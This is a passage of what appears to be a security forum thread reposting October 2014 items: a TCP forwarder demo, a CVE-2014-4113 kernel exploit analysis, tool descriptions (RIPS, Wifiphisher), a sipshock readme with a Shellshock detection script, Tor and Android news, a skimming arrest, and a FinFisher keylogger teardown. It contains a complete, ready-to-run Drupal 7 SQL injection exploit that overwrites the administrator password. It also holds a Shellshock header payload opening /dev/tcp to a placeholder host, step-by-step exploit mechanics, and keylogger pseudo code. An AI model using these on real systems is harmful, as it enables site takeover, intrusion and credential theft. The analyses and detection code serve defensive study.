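    lsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    lsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    lsock.bind((bind_addr, listen_port))
    lsock.listen(5)

    def accept_loop():
        while True:
            try:
                client, _ = lsock.accept()
            except OSError:
                return  # listener was closed
            try:
                upstream = socket.create_connection((target_host, target_port), timeout=5)
                upstream.settimeout(None)  # connect timeout only; relay is unbounded
            except OSError:
                client.close()  # upstream refused: drop this client, keep listening
                continue
            threading.Thread(target=_pipe, args=(client, upstream), daemon=True).start()
            threading.Thread(target=_pipe, args=(upstream, client), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return lsock


def start_echo_server():
    """Constructed stand-in for the remote service: reads until EOF, echoes back."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                chunks = []
                while True:
                    data = conn.recv(4096)
                    if not data:
                        break
                    chunks.append(data)
                conn.sendall(b"".join(chunks))

    threading.Thread(target=serve, daemon=True).start()
    return srv


def round_trip(payload):
    """Send payload through a fresh forwarder to the echo server; return the reply."""
    echo = start_echo_server()
    fwd = start_forwarder(0, "127.0.0.1", echo.getsockname()[1])
    try:
        with socket.create_connection(("127.0.0.1", fwd.getsockname()[1]), timeout=5) as c:
            c.sendall(payload)
            c.shutdown(socket.SHUT_WR)  # tell the far end we are done sending
            reply = b""
            while True:
                data = c.recv(4096)
                if not data:
                    break
                reply += data
        return reply
    finally:
        fwd.close()
        echo.close()


if __name__ == "__main__":
    print(round_trip(b"GET / HTTP/1.0\r\n\r\n"))
```

Running it sends a request through the forwarder and prints the echoed bytes. Passing bind_addr="0.0.0.0" to start_forwarder is the equivalent of ssh -g: the tunnel then becomes a service for everyone who can reach the machine, which is usually not what the person who typed the ssh command had in mind.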
-
Or get yourself an Apple: Mac mini Desktop PC system with Intel® Core™ i7 2.30GHz processor, 4GB, 2TB, Intel® HD Graphics, OS X Server, RO - eMAG.ro
-
An Analysis of A Windows Kernel-Mode Vulnerability (CVE-2014-4113)
6:35 pm (UTC-7) | by Weimin Wu (Threat Analyst)

Three zero-day vulnerabilities - CVE-2014-4114, CVE-2014-4148, and CVE-2014-4113 - were reported last week and patched by Microsoft in their October 2014 Patch Tuesday. CVE-2014-4114, also known as the Sandworm vulnerability, can enable attackers to easily craft malware payloads when exploited. This particular vulnerability has been linked to targeted attacks against European sectors and industries. In addition, our researchers found that Sandworm was also being used to target SCADA systems.

The latter two vulnerabilities (CVE-2014-4148, CVE-2014-4113) leveraged vulnerabilities in the Windows kernel (Win32k.sys), affecting most Windows versions. In 2013, only one Windows kernel zero-day was made public; this particular vulnerability only affected some versions of Windows XP and Windows 2003. These new zero-days could be a sign that attackers are possibly shifting their focus back to kernel vulnerabilities.

CVE-2014-4113 allows for the elevation of privileges when exploited successfully. Microsoft addressed this in MS14-058. The vulnerability affects both desktop and server versions from Windows XP and Server 2003 up to Windows 8.1 and Server 2012 R2. However, the currently available exploit code does not affect Windows 8 and later versions. With a parameter in the command line, the exploit code can create new processes with System privileges of an assigned program.

EoP exploits are also believed to be used in targeted attacks, since the exploitable application does not have the privileges needed by attackers. This was seen in Stuxnet, which employed CVE-2010-2743 (also in Win32k.sys) for EoP after using other exploits to infect the system.

The analysis of this vulnerability and its exploit will be based on samples with the following MD5 hashes:

    70857e02d60c66e27a173f8f292774f1
    f9f01ce747679b82723b989d01c4d927

We detect these as TROJ_APOLMY.A and TROJ64_APOLMY.A, with the latter being the version found on 64-bit systems.

Everything you need to know about the Win32k.sys vulnerability

Win32k.sys is responsible for window management, and any GUI process/thread will use it. Its related user-mode modules are user32.dll and GDI32.dll. Due to the complex interaction with user-mode applications, there are many problems in Win32k.sys. Let's take a closer look at the vulnerability being exploited.

The essential problem is that the function return value is not validated correctly. Programmers tend to overlook this, but doing so is a serious security risk. In Win32k.sys, there is a function called xxxMNFindWindowFromPoint(), which returns the address of a win32k!tagWND structure or the error code -1 or -5. Another function, xxxHandleMenuMessages(), will call it and use its return value as a parameter of xxxSendMessage(). Below is the pseudo code:

    xxxHandleMenuMessages()
    {
        tagWnd* pWnd = xxxMNFindWindowFromPoint(…);
        …
        //without checking if the return value is a valid address
        xxxSendMessage(pwnd,…);
    }

Obviously, if the error code -1 or -5 is used in xxxSendMessage() as an address, it will result in an error, such as a blue screen. In user-mode code, this is currently not exploitable. We will see how the sample exploits this vulnerability in kernel-mode in the next section.

Below are the key steps or description on how the exploit occurs:

  1. Map a prepared memory section to the NULL page, which includes a fake win32k!tagWND structure and a pointer to shell code for EoP in that structure.
  2. Trigger the bug and make the return value (pWnd) of xxxMNFindWindowFromPoint() -5 (0xfffffffb).
  3. Because all to-be-checked fields in the fake structure are accessible and in proper values, xxxSendMessage() will treat -5 as a valid address. It will then call a function pointer in the structure, which is the pointer to the shell code.
  4. Replace the token in EPROCESS to elevate to SYSTEM privileges in shell code.
  5. Create a child process with SYSTEM privileges of the assigned program.

The sample uses SetWindowsHookEx() to control xxxMNFindWindowFromPoint() to return -5:

  1. Create a window and a 2-level popup menu.
  2. Hook that window's wndproc call.
  3. Track the popup menu on the window and enter the hook callback.
  4. In the hook callback, it changes the wndproc of the menu to another callback.
  5. In the menu's callback, it will destroy the menu and return -5 (PUSH 0xfffffffb; POP EAX).
  6. This leads xxxMNFindWindowFromPoint() on the destroyed menu to return -5.

Furthermore, the shell code of the sample is simple and direct, as can be seen from the snippet below. We can see that it gets the EPROCESS of the SYSTEM process (PID=4), and copies its privilege token to the EPROCESS of the current process.

Figure 1. Code snippet of the sample

From the analysis, we can see that it is easier to exploit these kernel vulnerabilities than to exploit vulnerabilities like Internet Explorer UAF vulnerabilities. Some effective protections in user-mode, like DEP, are easily bypassed in kernel-mode exploits. This is because a program, instead of entered data or script, is used to exploit the bug. Such code is by its nature already executable. With more application sandboxing adopted in the OS, kernel vulnerabilities will be more important for privilege elevation.

Though this exploitation method is not new anymore, it will be noticed by attackers, especially now that CVE-2014-4113 is public. During our sample sourcing, we even saw that the source code of an exploit creation tool was exposed. It is expected that more exploit variants will be created by attackers. We believe that threat actors and attackers need kernel vulnerabilities to carry out EoP attacks and break application sandboxing. Once information about these exploitation methods becomes more prevalent, we may see more similar kernel zero-day vulnerabilities in the future.

Windows 7 and Windows XP are the versions of Windows most at risk of this attack. Enterprises are heavy users of both versions, and may be affected by this threat. We highly recommend that users and system administrators apply the relevant patches and keep their systems up-to-date.

Windows 8 and later versions are at less risk, as the currently available exploit code is blocked on these versions. This is because of a new security feature known as Supervisor Mode Execution Prevention (SMEP), which prevents the access (read/write/execute) of user-mode memory pages in kernel-mode. As such, the access to the null page and shell code will not lead to code execution, although it will lead to crashes.

Trend Micro is continuously monitoring the threat landscape for any developments regarding these vulnerabilities including Sandworm. For more information on them, you may read our other articles:

    Sandworm to Blacken: The SCADA Connection
    An Analysis of Windows Zero-day Vulnerability 'CVE-2014-4114' aka "Sandworm"
    MS Zero-Day Used in Attacks Against European Sectors, Industries

Source: An Analysis of A Windows Kernel-Mode Vulnerability (CVE-2014-4113) | Security Intelligence Blog | Trend Micro
-
18 October 2014 | 734 views

RIPS – Static Source Code Analysis For PHP Vulnerabilities

RIPS is a tool written in PHP to find vulnerabilities using static source code analysis for PHP web applications. By tokenizing and parsing all source code files RIPS is able to transform PHP source code into a program model and to detect sensitive sinks (potentially vulnerable functions) that can be tainted by user input (influenced by a malicious user) during the program flow. Besides the structured output of found vulnerabilities RIPS also offers an integrated code audit framework for further manual analysis.

Features

  * detect XSS, SQLi, File disclosure, LFI/RFI, RCE vulnerabilities and more
  * 5 verbosity levels for debugging your scan results
  * mark vulnerable lines in source code viewer
  * highlight variables in the code viewer
  * user-defined function code by mouse-over on detected call
  * active jumping between function declaration and calls
  * list of all user-defined functions (defines and calls), program entry points (user input) and scanned files (with includes) connected to the source code viewer
  * graph visualization for files and includes as well as functions and calls
  * create CURL exploits for detected vulnerabilities with few clicks
  * visualization, description, example, PoC, patch and securing function list for every vulnerability
  * 7 different syntax highlighting colour schemata
  * display scan result in form of a top-down flow or bottom-up trace
  * only minimal requirement is a local webserver with PHP and a browser (tested with Firefox)
  * regex search function

There are other PHP-centric tools we've covered such as:

  – RATS – Rough Auditing Tool for Security
  – Skavenger – Source Code Auditing Tool!
  – SpikeSource Spike PHP Security Audit Tool

If you are interested in more tools of this type you can find our complete list here (which covers various languages) – Code Auditing Tools.

NOTE: The authors have stated that RIPS 0.5 development is abandoned. A complete rewrite is in the works and used as an academic prototype but it is not publicly available yet. So we'll be keeping an eye on what happens with that.

But for now you can download RIPS here:

    rips-0.54.zip

Or read more here.

Source: RIPS - Static Source Code Analysis For PHP Vulnerabilities - Darknet - The Darkside
-
[h=2]About[/h]

Wifiphisher is a security tool that mounts fast automated phishing attacks against WPA networks in order to obtain the secret passphrase. It is a social engineering attack that, unlike other methods, does not include any brute forcing. It is an easy way of obtaining WPA credentials.

Wifiphisher works on Kali Linux and is licensed under the MIT license.

From the victim's perspective, the attack takes place in three phases:

  1. Victim is being deauthenticated from her access point. Wifiphisher continuously jams all of the target access point's wifi devices within range by sending deauth packets to the client from the access point, to the access point from the client, and to the broadcast address as well.
  2. Victim joins a rogue access point. Wifiphisher sniffs the area and copies the target access point's settings. It then creates a rogue wireless access point that is modeled on the target. It also sets up a NAT/DHCP server and forwards the right ports. Consequently, because of the jamming, clients will start connecting to the rogue access point. After this phase, the victim is MiTMed.
  3. Victim is being served a realistic router config-looking page. wifiphisher employs a minimal web server that responds to HTTP & HTTPS requests. As soon as the victim requests a page from the Internet, wifiphisher will respond with a realistic fake page that asks for WPA password confirmation due to a router firmware upgrade.

Performing MiTM attack

[h=2]Usage[/h]

[h=2]Screenshots[/h]

Targeting an access point

A successful attack

[h=2]Requirements[/h]

  * Kali Linux.
  * Two network interfaces, one wireless.
  * A wireless card capable of injection.

[h=2]Credits[/h]

The idea belongs to Dan McInerney who also authored two essential modules of this script, wifijammer and fakeAP.

[h=2]License[/h]

Wifiphisher is licensed under the MIT license. See LICENSE for more information.

Source: https://github.com/sophron/wifiphisher
-
Usage: sipshock [ Flags ] [ IP Addresses ]

Usage flags:

    lhost : Local listening address
    lport : Local listening port (default 10111)
    rport : Remote port (default 5060)

The exec module in Kamailio, Opensips and probably every other SER fork passes the received SIP headers as environment variables to the invoking shell. This makes these SIP proxies vulnerable to CVE-2014-6271 (Bash Shellshock). If a proxy is using any of the exec functions and has the 'setvars' parameter set to the default value '1' then by sending SIP messages containing a specially crafted header we can run arbitrary code on the proxy machine.

Sipshock tries to detect such vulnerable proxies by sending SIP INVITE messages containing the following header:

    "X-Ploit: () { :;};exec >/dev/tcp/xx.xx.xx.xx/yy"

where xx.xx.xx.xx/yy is the local IP and port that sipshock listens to. A vulnerable server will invoke a shell that will execute the code above and open a tcp connection to xx.xx.xx.xx:yy. Sipshock detects the connection and lists the server as vulnerable.

This program is free software, distributed under the terms of the GNU General Public License Version 3. See the LICENSE file at the top of the source tree.

Source: https://github.com/zaf/sipshock
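The detection side of the same observation, as an added example that is not sipshock's code: because the exec module exports every received header as an environment variable, the bash function prologue "() {" that all Shellshock payloads must carry can arrive in any header, not only a custom X- header, and SIP permits folded (multi-line) header values, so a scanner that matches line by line misses a prologue split across a fold. The INVITE messages below are constructed samples, not captured traffic.

```python
"""Shellshock-style header detection for SIP requests.

Added example (not sipshock's own code). Sample messages are constructed.
"""
import re
from typing import List, Tuple

# The exported-function prologue "() {" is the one token every Shellshock
# payload must contain, whatever command follows it.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")


def parse_sip_headers(message: str) -> List[Tuple[str, str]]:
    """Return (name, value) pairs for a SIP request, joining folded lines
    (RFC 3261 section 7.3.1: a value may continue on lines that begin with
    whitespace). Anything after the blank line (the body) is ignored."""
    head = message.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers: List[Tuple[str, str]] = []
    for line in lines[1:]:  # lines[0] is the request line
        if not line:
            continue
        if line[0] in " \t" and headers:  # continuation of the previous header
            name, value = headers[-1]
            headers[-1] = (name, value + " " + line.strip())
            continue
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return headers


def find_shellshock_headers(message: str) -> List[Tuple[str, str]]:
    """Headers whose unfolded value carries the function-definition prologue."""
    return [(n, v) for n, v in parse_sip_headers(message) if SHELLSHOCK_RE.search(v)]


# Constructed sample traffic; example.invalid / 192.0.2.x are documentation addresses.
BENIGN_INVITE = (
    "INVITE sip:bob@example.invalid SIP/2.0\r\n"
    "Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bK776asdhds\r\n"
    "From: <sip:alice@example.invalid>;tag=1928301774\r\n"
    "To: <sip:bob@example.invalid>\r\n"
    "Call-ID: a84b4c76e66710@192.0.2.10\r\n"
    "CSeq: 314159 INVITE\r\n"
    "User-Agent: softphone/1.0 (build {2014})\r\n"  # braces alone are not a hit
    "Content-Length: 0\r\n"
    "\r\n"
)

SUSPICIOUS_INVITE = (
    "INVITE sip:bob@example.invalid SIP/2.0\r\n"
    "Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bK776asdhds\r\n"
    "From: <sip:alice@example.invalid>;tag=1928301774\r\n"
    "To: <sip:bob@example.invalid>\r\n"
    "Call-ID: a84b4c76e66710@192.0.2.10\r\n"
    "CSeq: 314159 INVITE\r\n"
    "User-Agent: () { :;}; echo shellshock-probe\r\n"  # a standard header abused
    "X-Ploit: ()\r\n"
    " { :;}; echo folded-probe\r\n"                     # prologue split by folding
    "Content-Length: 0\r\n"
    "\r\n"
)


if __name__ == "__main__":
    for label, msg in (("benign", BENIGN_INVITE), ("suspicious", SUSPICIOUS_INVITE)):
        print(label, find_shellshock_headers(msg))
```

The same check belongs in front of the proxy itself: a Kamailio or OpenSIPS deployment that cannot yet patch bash can drop or log requests where any header matches this pattern, and the unfolding step is what keeps that filter from being trivially sidestepped.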
-
Update (Oct 16 20:35 UTC): The meek transport still needs performance tuning before it matches other more conventional transports. Ticket numbers are now listed in the post.

The first release of the 4.0 series is available from the Tor Browser Project page and also from our distribution directory.

This release features important security updates to Firefox. Additionally, due to the POODLE attack, we have also disabled SSLv3 in this release.

The primary user-facing change since the 3.6 series is the transition to Firefox 31-ESR. More importantly for censored users who were using 3.6, the 4.0 series also features the addition of three versions of the meek pluggable transport. In fact, we believe that both meek-amazon and meek-azure will work in China today, without the need to obtain bridge addresses. Note that we still need to improve meek's performance to match other transports, so adjust your expectations accordingly. See tickets #12428, #12778, and #12857 for details.

This release also features an in-browser updater, and a completely reorganized bundle directory structure to make this updater possible. This means that simply extracting a 4.0 Tor Browser over a 3.6.6 Tor Browser will not work. Please also be aware that the security of the updater depends on the specific CA that issued the www.torproject.org HTTPS certificate (Digicert), and so it still must be activated manually through the Help ("?") "about browser" menu option. Very soon, we will support both strong HTTPS site-specific certificate pinning (ticket #11955) and update package signatures (ticket #13379). Until then, we do not recommend using this updater if you need stronger security and normally verify GPG signatures.

There are also a couple of behavioral changes relating to NoScript since 3.6. In particular, by default it now enforces script enable/disable for all sub-elements of a page, so you only need to enable scripts once for a page to work, rather than enabling many sub-scripts. This will hopefully make it possible for more people to use the "High Security" setting in our upcoming Security Slider, which will have Javascript disabled globally via NoScript by default. While we do not recommend per-element whitelisting due to fingerprinting, users who insist on keeping this functionality may wish to check out RequestPolicy.

Note to MacOS users: We intend to deprecate 32bit OSX bundles very soon. If you are still using 32bit OSX 10.6, you soon will need to either update your OS to a later version, or begin using the Tails live operating system.

Here is the changelog since 4.0-alpha-3:

  * All Platforms
      * Update Firefox to 31.2.0esr
      * Update Torbutton to 1.7.0.1
          * Bug 13378: Prevent addon reordering in toolbars on first-run.
          * Bug 10751: Adapt Torbutton to ESR31's Australis UI.
          * Bug 13138: ESR31-about:tor shows "Tor is not working"
          * Bug 12947: Adapt session storage blocker to ESR 31.
          * Bug 10716: Take care of drag/drop events in ESR 31.
          * Bug 13366: Fix cert exemption dialog when disk storage is enabled.
      * Update Tor Launcher to 0.2.7.0.1
          * Translation updates only
      * Update fteproxy to 0.2.19
      * Update NoScript to 2.6.9.1
      * Bug 13027: Spoof window.navigator useragent values in JS WebWorker threads
      * Bug 13016: Hide CSS -moz-osx-font-smoothing values.
      * Bug 13356: Meek and other symlinks missing after complete update.
      * Bug 13025: Spoof screen orientation to landscape-primary.
      * Bug 13346: Disable Firefox "slow to start" warnings and recordkeeping.
      * Bug 13318: Minimize number of buttons on the browser toolbar.
      * Bug 10715: Enable WebGL on Windows (still click-to-play via NoScript)
      * Bug 13023: Disable the gamepad API.
      * Bug 13021: Prompt before allowing Canvas isPointIn*() calls.
      * Bug 12460: Several cross-compilation and gitian fixes (see child tickets)
      * Bug 13186: Disable DOM Performance timers
      * Bug 13028: Defense-in-depth checks for OCSP/Cert validation proxy usage
      * Bug 13416: Defend against new SSLv3 attack (poodle).

Here is the list of all changes in the 4.0 series since 3.6.6:

  * All Platforms
      * Update Firefox to 31.2.0esr
      * Update fteproxy to 0.2.19
      * Update Tor to 0.2.5.8-rc (from 0.2.4.24)
      * Update NoScript to 2.6.9.1
      * Update Torbutton to 1.7.0.1 (from 1.6.12.3)
          * Bug 13378: Prevent addon reordering in toolbars on first-run.
          * Bug 10751: Adapt Torbutton to ESR31's Australis UI.
          * Bug 13138: ESR31-about:tor shows "Tor is not working"
          * Bug 12947: Adapt session storage blocker to ESR 31.
          * Bug 10716: Take care of drag/drop events in ESR 31.
          * Bug 13366: Fix cert exemption dialog when disk storage is enabled.
      * Update Tor Launcher to 0.2.7.0.1 (from 0.2.5.6)
          * Bug 11405: Remove firewall prompt from wizard.
          * Bug 12895: Mention @Riseup.net as a valid bridge request email address
          * Bug 12444: Provide feedback when "Copy Tor Log" is clicked.
          * Bug 11199: Improve error messages if Tor exits unexpectedly
          * Bug 12451: Add option to hide TBB's logo
          * Bug 11193: Change "Tor Browser Bundle" to "Tor Browser"
          * Bug 11471: Ensure text fits the initial configuration dialog
          * Bug 9516: Send Tor Launcher log messages to Browser Console
      * Bug 13027: Spoof window.navigator useragent values in JS WebWorker threads
      * Bug 13016: Hide CSS -moz-osx-font-smoothing values.
      * Bug 13356: Meek and other symlinks missing after complete update.
      * Bug 13025: Spoof screen orientation to landscape-primary.
      * Bug 13346: Disable Firefox "slow to start" warnings and recordkeeping.
      * Bug 13318: Minimize number of buttons on the browser toolbar.
      * Bug 10715: Enable WebGL on Windows (still click-to-play via NoScript)
      * Bug 13023: Disable the gamepad API.
      * Bug 13021: Prompt before allowing Canvas isPointIn*() calls.
      * Bug 12460: Several cross-compilation and gitian fixes (see child tickets)
      * Bug 13186: Disable DOM Performance timers
      * Bug 13028: Defense-in-depth checks for OCSP/Cert validation proxy usage
      * Bug 4234: Automatic Update support (off by default)
      * Bug 11641: Reorganize bundle directory structure to mimic Firefox
      * Bug 10819: Create a preference to enable/disable third party isolation
      * Bug 13416: Defend against new SSLv3 attack (poodle).
  * Windows:
      * Bug 10065: Enable DEP, ASLR, and SSP hardening options
  * Linux:
      * Bug 13031: Add full RELRO hardening protection.
      * Bug 10178: Make it easier to set an alternate Tor control port and password
      * Bug 11102: Set Window Class to "Tor Browser" to aid in Desktop navigation
      * Bug 12249: Don't create PT debug files anymore

The list of frequently encountered known issues is also available in our bug tracker.

Source: https://blog.torproject.org/blog/tor-browser-40-released?linkId=10066746
-
- 1
-
-
You have no ACKs for the packets you send. I don't know why the guy says it isn't important for all the packets to arrive, but if not all the packets had arrived while he was posting on his blog and only half the article showed up, he probably wouldn't have been so happy. You have no connection, and look: you receive data from someone, let's say an important file. And suddenly that person's connection dies. Do you know that? No. You have just received half a file. We live in the gigabit era; a few bytes in the packet headers don't, I think, have an impact anywhere near as big as losing important data.
-
Whoa, looks good.
-
[h=1]Skimming gang dismantled by Bucharest police[/h]
SPECIAL • 16 October 2014 - 16:21 • B365.ro

Five men are suspected of having manufactured and sold home-made devices intended for cloning cards. Several data storage media, laptops, hard disks, mobile phones, and bank and loyalty cards were seized from their homes.

Officers of the Bucharest Brigade for Combating Organised Crime and prosecutors of D.I.I.C.O.T. – S.T. Bucharest have dismantled a criminal group specialised in manufacturing home-made devices intended for cloning bank cards and installing them on ATMs.

To prove the criminal activity of the group's five members, 10 searches were carried out on 14 October 2014 at various premises used by them. As a result of these operations, several data storage media, laptops, hard disks, mobile phones, and bank and loyalty cards were identified and seized.

Those involved were taken to the DIICOT Bucharest headquarters for questioning and investigation, and the preventive measure of judicial control was ordered against them.

The investigation began six months ago, and the inquiry produced indications that the group's members had possessed the tools and equipment needed to manufacture skimming devices and had manufactured such devices. The devices in question were also tested on ATMs in Bucharest to check that they worked correctly, as well as to run demonstrations for prospective buyers.

Criminal proceedings were initiated against the five persons for the offences of initiating, setting up and joining an organised criminal group, possession of equipment for the purpose of counterfeiting electronic payment instruments, and illegal operations with devices or computer programs.

Source: Skimming gang dismantled by Bucharest police | B365
-
[h=1]Drupal 7.x SQL Injection SA-CORE-2014-005[/h]

#Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
#Creditz to https://www.reddit.com/user/fyukyuk

import urllib2, sys
from drupalpass import DrupalHash  # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py

if len(sys.argv) != 4:
    print "host username password"
    print "http://nope.io admin wowsecure"
    sys.exit(1)

host = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]

hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()

target = '%s/?q=node&destination=node' % host

post_data = "name[0%20;update+users+set+name%3d\'" \
    + user \
    + "'+,+pass+%3d+'" \
    + hash[:55] \
    + "'+where+uid+%3d+\'1\';;#%20%20]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in"

content = urllib2.urlopen(url=target, data=post_data).read()

if "mb_strlen() expects parameter 1" in content:
    print "Success!\nLogin now with user:%s and pass:%s" % (user, password)

Exploit: [Python] Drupal 7.x SQL Injection SA-CORE-2014-005 - Pastebin.com
-
Nexus 9 will be the first device powered by Lollipop
By Cosmin Vasile on October 15th, 2014 18:21 GMT

As expected, Google announced its new version of Android, along with the Nexus 9 tablet, Nexus 6 smartphone and Nexus Player set-top box. With more than 5,000 new APIs for developers, Android 5.0 Lollipop is Google's most ambitious release since the mobile platform made its debut back in 2008.

The most popular mobile operating system to date, Android is now focusing on flexibility and personalization options. Even though it's considered by many the most customizable mobile platform, Android 5.0 Lollipop focuses on convergence. Once again, Google is trying to bring to the market a product that could be used on multiple devices of different categories, such as phones, tablets and TVs.

Lollipop has been especially designed to offer users the possibility to pick up where they left off, “so the songs, photos, apps, and even recent searches from one of your Android devices can be immediately enjoyed across all the other ones.”

The focus of Android 5.0 is on smoother transitions from one screen to another, so users can experience the same feel on any of the devices mentioned earlier. In this regard, Google has created a consistent design across all compatible devices, which is called Material Design. This will allow for smoother transitions between tasks and more intuitive ways to interact with your devices.

More control over devices is another improvement Google has added into Lollipop, which allows users to adjust their settings so that only certain people and notifications get through. Moreover, you will be able to see an important notification directly on the lockscreen.

[h=3]Surprisingly, Nexus 4 qualifies for an Android 5.0 Lollipop update[/h]

Android 5.0 Lollipop brings lots of new features and improvements, including a new battery saver that should extend battery life by up to 90 minutes. Google also added a guest user mode and enabled multiple user accounts, so personal data will remain private between users.

Several security features have been included as well, such as the option to secure a device with a PIN, password, pattern, or even by pairing it to a trusted device like a watch or car with Smart Lock.

The good news is Google confirmed Android 5.0 Lollipop will be available on Nexus 4 and Nexus 5 smartphones, as well as Nexus 7 and Nexus 10 tablets. All Google Play edition devices will receive the new version of the OS as an update “in the coming weeks.” The only devices that have been confirmed to ship with Android 5.0 Lollipop out of the box are Nexus 6, Nexus 9 and Nexus Player.

Source and video: Android 5.0 Is Lollipop, Brings Material Design to Phones, Tablets and TVs - Softpedia
-
Posted on: 14 October 2014 By: siteadm

As requested on reddit and twitter, this time I'm going to analyze the final pieces of FinFisher malware: shell extension, driverw.sys and mssounddx.sys. No time to waste, so let's begin:

a) Shell Extension (KeyLogger)

As the title says, the shell extension's main/whole purpose is logging the user's keystrokes. As Finfisher malware never ceased to amaze me, this shell extension amazed me too. This DLL file basically sets up a global hook using the SetWindowsHookEx API and records the user's keystrokes, like a typical simple keylogger, but with a small difference. This keylogger doesn't hook WH_KEYBOARD or WH_KEYBOARD_LL, it hooks WH_GETMESSAGE, so basic keylogger detection methods won't be able to call it a "keylogger"; even static analysis wouldn't show it as a keylogger, because it's hooking window messages. Anyway, I'll do my best to decompile and write pseudo code of the DLL file.

Before starting, I should mention that the DLL compilation date/time is 10/28/2010 11:57:36 AM, which I think is correct and unaltered. Anyway, here are the details of the DLL:

- Calls the CreateEventW API with "Local\\{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFA0}" as event.
- Calls LoadString (unicode) two times to load two strings from resources and then uses them as filenames for saving logged keys and window titles. Filenames are: "\\\\.\\mailslot\\{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFE0}" (FILE1) and "\\\\.\\mailslot\\{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFE1}" (FILE2)
- Opens both these files at the beginning and stores the handles globally, so the whole DLL will be able to call WriteFile using the same handle.
- Sets up ImmGetCompositionStringA and ImmGetCompositionStringW hooks; these two are exported from imm32.dll.
- Calls SetWindowsHookExW to set up a global hook using WH_GETMESSAGE as hook type.
- In the hook handler (callback) function, checks the message type against WM_KEYDOWN and uses the WriteFile API to write keystroke details to FILE1.

So pseudo code should be something like this:

void SetupHook()
{
    HANDLE eventHandle = CreateEventW(0, 0, 0, L"Local\\{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFA0}");
    if (eventHandle)
    {
        if ( GetLastError() == 183 )   // ERROR_ALREADY_EXISTS: another instance is active
            CloseHandle(eventHandle);
        else
        {
            if ( HookHandle )
            {
                UnhookWindowsHookEx(HookHandle);
                HookHandle = NULL;
                glbVar1 = 0;
            }
        }
    }

    // Resource strings 0x101 and 0x102 hold the two mailslot names (FILE1, FILE2)
    if ( !LoadStringW(hmod, 0x101, &File1, 260) || !LoadStringW(hmod, 0x102, &File2, 260) )
        return;

    glbHandleFile1 = CreateFileW(&File1, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, 0x03, 0, 0);   // 0x03 = OPEN_EXISTING
    if ( glbHandleFile1 == (HANDLE)-1 )
    {
        lstErr = GetLastError();
        errmsg = FormatMessageCall(lstErr);
        LocalFree((HLOCAL)errmsg);
    }

    glbHandleFile2 = CreateFileW(&File2, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, 0x03, 0, 0);
    if ( glbHandleFile1 == (HANDLE)-1 )
    {
        lstErr = GetLastError();
        errmsg = FormatMessageCall(lstErr);
        LocalFree((HLOCAL)errmsg);
    }

    // Inline hooks on the IME composition-string APIs (captures IME input too)
    imm32Handle = LoadLibraryA("imm32.dll");
    if ( imm32Handle )
    {
        fGetCompositionW = GetProcAddress(imm32Handle, "ImmGetCompositionStringW");
        ret = HookSetup(fGetCompositionW, (int)GetCompositionWHook, (int)&RealGetCompositionW);
        fGetCompositionA = GetProcAddress(imm32Handle, "ImmGetCompositionStringA");
        ret = HookSetup(fGetCompositionA, (int)GetCompositionAHook, (int)&RealGetCompositionA);
    }

    glbHHook = SetWindowsHookExW(WH_GETMESSAGE, (HOOKPROC)HookCallback, hmod, 0);
}

LRESULT CALLBACK HookCallback(int code, WPARAM wParam, LPARAM lParam)
{
    LPMSG lpMsg = (LPMSG) lParam;
    if (!code && wParam == 1 && lpMsg->message == WM_KEYDOWN)   // wParam == PM_REMOVE
    {
        memset(&Dst, 0, 0x434);
        GetKeyboardLayoutNameA(&pwszKLID);
        HWND TheHWND = lpMsg->hwnd;
        HWND pHWND = TheHWND;
        curProcID = GetCurrentProcessId();
        GetWindowThreadProcessId(TheHWND, &dwProcessId);
        hWnd = v6;
        // Walk up to the top-level window of this process to grab its title
        while ( curProcID == dwProcessId )
        {
            pHWND = TheHWND;
            pHWND = GetParent(pHWND);
            if ( !pHWND )
                break;
            GetWindowThreadProcessId(pHWND, &dwProcessId);
        }
        memset(&wndTitle, 0, 0x208);
        GetWindowTextW(pHWND, &wndTitle, 259);
        WriteFile(File1, &Dst, 0x434u, &NumberOfBytesWritten, (LPOVERLAPPED)v7);
    }
    return CallNextHookEx(hHook, code, wParam, lParam);
}

So, using Microsoft's sample code, I wrote a program to listen on both slots, here is the code:

#include <windows.h>
#include <tchar.h>
#include <stdio.h>
#include <strsafe.h>

HANDLE TheSlot1;
HANDLE TheSlot2;
LPTSTR SlotName  = TEXT("\\\\.\\mailslot\\{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFE0}");
LPTSTR SlotName2 = TEXT("\\\\.\\mailslot\\{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFE1}");

BOOL ReadSlot(HANDLE hSlot)
{
    DWORD cbMessage, cMessage, cbRead;
    BOOL fResult;
    LPTSTR lpszBuffer;
    TCHAR achID[80];
    DWORD cAllMessages;
    HANDLE hEvent;
    OVERLAPPED ov;

    cbMessage = cMessage = cbRead = 0;

    hEvent = CreateEvent(NULL, FALSE, FALSE, TEXT("ExampleSlot"));
    if( NULL == hEvent )
        return FALSE;
    ov.Offset = 0;
    ov.OffsetHigh = 0;
    ov.hEvent = hEvent;

    fResult = GetMailslotInfo( hSlot,        // mailslot handle
        (LPDWORD) NULL,                       // no maximum message size
